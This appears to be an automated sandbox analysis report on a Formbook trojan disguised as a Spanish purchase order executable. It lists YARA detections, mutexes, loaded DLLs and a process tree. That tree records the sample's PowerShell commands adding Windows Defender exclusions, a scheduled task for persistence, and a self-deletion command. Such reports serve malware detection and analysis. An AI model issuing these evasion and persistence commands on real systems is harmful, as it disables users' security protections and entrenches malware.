          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2F0E014_2_04C2F0E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C270E914_2_04C270E9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B770C014_2_04B770C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B7B1B014_2_04B7B1B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C3B16B14_2_04C3B16B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B5F17214_2_04B5F172
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA516C14_2_04BA516C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B752A014_2_04B752A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C112ED14_2_04C112ED
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B8B2C014_2_04B8B2C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BB739A14_2_04BB739A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2132D14_2_04C2132D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B5D34C14_2_04B5D34C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2FCF214_2_04C2FCF2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BE9C3214_2_04BE9C32
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B8FDC014_2_04B8FDC0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C21D5A14_2_04C21D5A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C27D7314_2_04C27D73
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B73D4014_2_04B73D40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B79EB014_2_04B79EB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B71F9214_2_04B71F92
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2FFB114_2_04C2FFB1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04C2FF0914_2_04C2FF09
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04B738E014_2_04B738E0
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BDD800
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04C05910
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04B79950
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04B8B950
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04C1DAC6
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BB5AA0
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04C11AA3
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04C0DAAC
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04C27A46
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04C2FA49
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BE3A6C
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04B8FB80
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BADBF9
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04BE5BF0
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04C2FB76
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_029EEB71
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_029EDE5F
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_029D9E60
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_029D2FB0
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_029D2D90
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_029D2D88
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_0497A036
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_0497E5CD
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04972D02
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04971082
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04978912
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_0497B232
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04975B32
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_04975B30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 018A5130 appears 58 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 018EF290 appears 105 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 018DEA12 appears 86 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 018B7E54 appears 111 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0185B970 appears 280 times
          Source: C:\Windows\SysWOW64\systray.exe | Code function: String function: 04BEF290 appears 105 times
          Source: C:\Windows\SysWOW64\systray.exe | Code function: String function: 04BB7E54 appears 111 times
          Source: C:\Windows\SysWOW64\systray.exe | Code function: String function: 04BDEA12 appears 86 times
          Source: C:\Windows\SysWOW64\systray.exe | Code function: String function: 04B5B970 appears 280 times
          Source: C:\Windows\SysWOW64\systray.exe | Code function: String function: 04BA5130 appears 58 times
          Source: Orden de compra 0307AR24.exe | Static PE information: invalid certificate
          Source: Orden de compra 0307AR24.exe, 00000000.00000002.2164458182.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRT.dll. vs Orden de compra 0307AR24.exe
          Source: Orden de compra 0307AR24.exe, 00000000.00000000.2087208512.0000000000A72000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameKoCj.exe\ vs Orden de compra 0307AR24.exe
          Source: Orden de compra 0307AR24.exe, 00000000.00000002.2171498759.0000000008F00000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRT.dll. vs Orden de compra 0307AR24.exe
          Source: Orden de compra 0307AR24.exe, 00000000.00000002.2162926053.000000000120E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Orden de compra 0307AR24.exe
          Source: Orden de compra 0307AR24.exe, 00000000.00000002.2167456218.0000000004DA0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Orden de compra 0307AR24.exe
          Source: Orden de compra 0307AR24.exe, 00000000.00000002.2165242288.000000000477E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Orden de compra 0307AR24.exe
          Source: Orden de compra 0307AR24.exe | Binary or memory string: OriginalFilenameKoCj.exe\ vs Orden de compra 0307AR24.exe
          Source: Orden de compra 0307AR24.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Matched YARA rules (rule metadata is listed once here; each match below names its rule):
          Windows_Trojan_Formbook_1112e116: reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Windows_Trojan_Formbook_772cc62d: os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          ironshell_php: author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
          Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116
          Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1
          Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook
          Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116
          Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1
          Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook
          Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
          Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1
          Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook
          Source: 0000000A.00000002.4559239704.000000001048C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d
          Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
          Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1
          Source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook
          Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
          Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1
          Source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook
          Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
          Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1
          Source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook
          Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
          Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1
          Source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook
          Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
          Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1
          Source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook
          Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
          Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1
          Source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook
          Source: Process Memory Space: Orden de compra 0307AR24.exe PID: 2572, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116
          Source: Process Memory Space: RegSvcs.exe PID: 7232, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116
          Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR | Matched rule: ironshell_php
          Source: Process Memory Space: RggSaCWUvAyNK.exe PID: 7360, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116
          Source: Process Memory Space: systray.exe PID: 7508, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116
          Source: Process Memory Space: rundll32.exe PID: 7796, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116
          Source: Orden de compra 0307AR24.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: RggSaCWUvAyNK.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, Q6M94gYctVNtw3H796.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, Q6M94gYctVNtw3H796.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, Q6M94gYctVNtw3H796.cs | Security API names: _0020.AddAccessRule
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, JvN7hpwJnm4gTu1HXw.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, Q6M94gYctVNtw3H796.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, Q6M94gYctVNtw3H796.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, Q6M94gYctVNtw3H796.cs | Security API names: _0020.AddAccessRule
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, JvN7hpwJnm4gTu1HXw.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@814/15@11/6
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | File created: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | Mutant created: NULL
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | Mutant created: \Sessions\1\BaseNamedObjects\EBvxQgpPCyASqqgsyudJCdIq
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6852:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | File created: C:\Users\user\AppData\Local\Temp\tmp362B.tmp
          Source: C:\Windows\SysWOW64\systray.exe | Command line argument: SystemTray_Main (function 14_2_002113B0)
          Source: Orden de compra 0307AR24.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Orden de compra 0307AR24.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
          Source: Orden de compra 0307AR24.exe | ReversingLabs: Detection: 26%
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | File read: C:\Users\user\Desktop\Orden de compra 0307AR24.exe
          Source: unknown | Process created: C:\Users\user\Desktop\Orden de compra 0307AR24.exe "C:\Users\user\Desktop\Orden de compra 0307AR24.exe"
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe"
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: unknown | Process created: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp5339.tmp"
          Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: mscoree.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: dwrite.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: textshaping.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: amsi.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: windowscodecs.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: textinputframework.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: coreuicomponents.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: edputil.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: appresolver.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: bcp47langs.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: slc.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: sppc.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
